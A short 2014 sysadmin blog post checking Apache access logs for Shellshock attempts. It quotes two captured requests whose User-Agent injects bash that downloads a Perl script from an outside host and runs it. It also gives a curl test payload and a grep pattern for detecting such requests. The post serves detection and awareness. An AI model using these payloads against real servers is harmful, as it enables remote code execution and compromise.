Header RSS Feed
 
If you only want to see the articles of a certain category, please click on the desired category below:
ALL Android Backup BSD Database Hacks Hardware Internet Linux Mail MySQL Monitoring Network Personal PHP Proxy Shell Solaris Unix Virtualization VMware Windows Wyse

Are there any shellshock attacks (in Apache access logs)?
Friday - Sep 26th 2014 - by - (1 comments)

Yes, shellshock is the nickname of the latest big vulnerability after the infamous SSL Heartbleed bug. But is it actually used? Do people attack?

I analyzed the access logs of ~1500 domains and I only found two hits:

109.95.210.196 - - [25/Sep/2014:19:48:24 +0200] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.1" 404 224 "-" "() { :;}; /bin/bash -c \"/usr/bin/wget http://singlesaints.com/firefile/temp?h=example.com -O /tmp/a.pl\""

213.5.67.223 - - [25/Sep/2014:15:45:47 +0200] "GET /cgi-bin/his HTTP/1.0" 404 278 "-" "() { :;}; /bin/bash -c \"cd /tmp;curl -O http://213.5.67.223/jur ; perl /tmp/jur;rm -rf /tmp/jur\""

To be honest, I expected a flood of such requests. Instead I can live very well with just two of them.

Update September 22nd 2017: Yes, I know: Kind of a late update. However it is worth to mention that the shellshock attack did work on http header level, too. So even if I couldn't find anything in the access logs (not all headers are logged here), that doesn't mean there were no shellshock-attacks. For example:

$ curl -H "X-Client-Something: Additional Header () { :;}; /bin/bash -c 'whoami'" https://www.example.com


 

Add a comment

Show form to leave a comment

Comments (newest first):

Alexander from Z├╝rich wrote on Sep 26th, 2014:
Easy way to grep:

grep -E '.*"\(' access_log


Go to Homepage home
Linux Howtos how to's
Monitoring Plugins monitoring plugins
Links links

Valid HTML 4.01 Transitional
Valid CSS!
[Valid RSS]

6937 Days
until Death of Computers
Why?